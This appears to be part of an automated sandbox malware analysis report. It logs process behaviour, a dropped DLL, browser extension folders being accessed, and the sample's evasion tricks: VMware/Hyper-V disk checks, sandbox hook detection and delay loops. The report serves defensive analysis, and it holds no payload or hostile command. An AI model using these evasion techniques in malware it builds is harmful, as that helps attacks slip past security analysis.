Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\djvbaae	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

20_2_03043862

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_22-856

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: aspnet_compiler.exe, 0000000D.00000002.2183507710.000000000109B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Users\user\AppData\Roaming\djvbaae	Memory allocated: AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\djvbaae	Memory allocated: 2500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\djvbaae	Memory allocated: 4500000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 20_2_030416C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

20_2_030416C7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djvbaae	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4088	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5624	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7080	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2633	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1593	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 883	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4763	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4945	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 378
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1467
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 709
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5467
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 822
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 824

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4480	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 916	Thread sleep count: 7080 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1928	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732	Thread sleep count: 2633 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856	Thread sleep count: 4763 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5576	Thread sleep count: 4945 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6036	Thread sleep count: 378 > 30
Source: C:\Windows\explorer.exe TID: 3796	Thread sleep count: 1467 > 30
Source: C:\Windows\explorer.exe TID: 3796	Thread sleep time: -146700s >= -30000s
Source: C:\Windows\explorer.exe TID: 3396	Thread sleep count: 709 > 30
Source: C:\Windows\explorer.exe TID: 3396	Thread sleep time: -70900s >= -30000s
Source: C:\Windows\explorer.exe TID: 3796	Thread sleep count: 5467 > 30
Source: C:\Windows\explorer.exe TID: 3796	Thread sleep time: -546700s >= -30000s
Source: C:\Users\user\AppData\Roaming\djvbaae TID: 3228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2312	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1700	Thread sleep count: 58 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1700	Thread sleep time: -58000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 412	Thread sleep count: 62 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 412	Thread sleep time: -62000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5560	Thread sleep count: 56 > 30
Source: C:\Windows\explorer.exe TID: 5560	Thread sleep time: -56000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5292	Thread sleep count: 44 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5292	Thread sleep time: -44000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5168	Thread sleep count: 54 > 30
Source: C:\Windows\explorer.exe TID: 5168	Thread sleep time: -54000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D62B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	17_2_02D62B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D63ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	17_2_02D63ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D61D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	17_2_02D61D4A
Source: C:\Windows\explorer.exe	Code function: 18_2_001E30A8 FindFirstFileW,FindNextFileW,FindClose,	18_2_001E30A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0066255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	19_2_0066255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_030415BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	20_2_030415BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_030414D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	20_2_030414D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_030413FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	20_2_030413FE
Source: C:\Windows\explorer.exe	Code function: 21_2_00711DB0 FindFirstFileW,FindNextFileW,FindClose,	21_2_00711DB0
Source: C:\Windows\explorer.exe	Code function: 21_2_00711EB4 FindFirstFileW,FindNextFileW,FindClose,	21_2_00711EB4

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02D66512 GetSystemInfo,

17_2_02D66512

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djvbaae	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: explorer.exe, 0000000E.00000002.3020456325.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: powershell.exe, 00000001.00000002.1954134272.0000000007319000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1954134272.0000000007341000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000009.00000002.2244287376.000000000A101000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 4'^qemU
Source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FsulatedPMSFT_NetEventVmNetworkAdatper.cdxml
Source: explorer.exe, 0000000E.00000000.2152059428.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000011.00000002.2435370827.0000000003200000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHc$
Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: wscript.exe, 00000006.00000003.1891152717.00000000056E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\kOe
Source: powershell.exe, 00000009.00000002.2161675097.0000000006F5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOt
Source: explorer.exe, 0000000E.00000000.2150818105.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 0000000E.00000000.2150818105.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 0000000E.00000002.3020456325.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: wscript.exe, 00000006.00000003.1891152717.00000000056E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.2152059428.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VallSecurMSFTMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 0000000E.00000000.2150818105.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000011.00000002.2435370827.0000000003246000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: explorer.exe, 0000000E.00000000.2147790112.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000E.00000000.2150818105.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

System information queried: ModuleInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

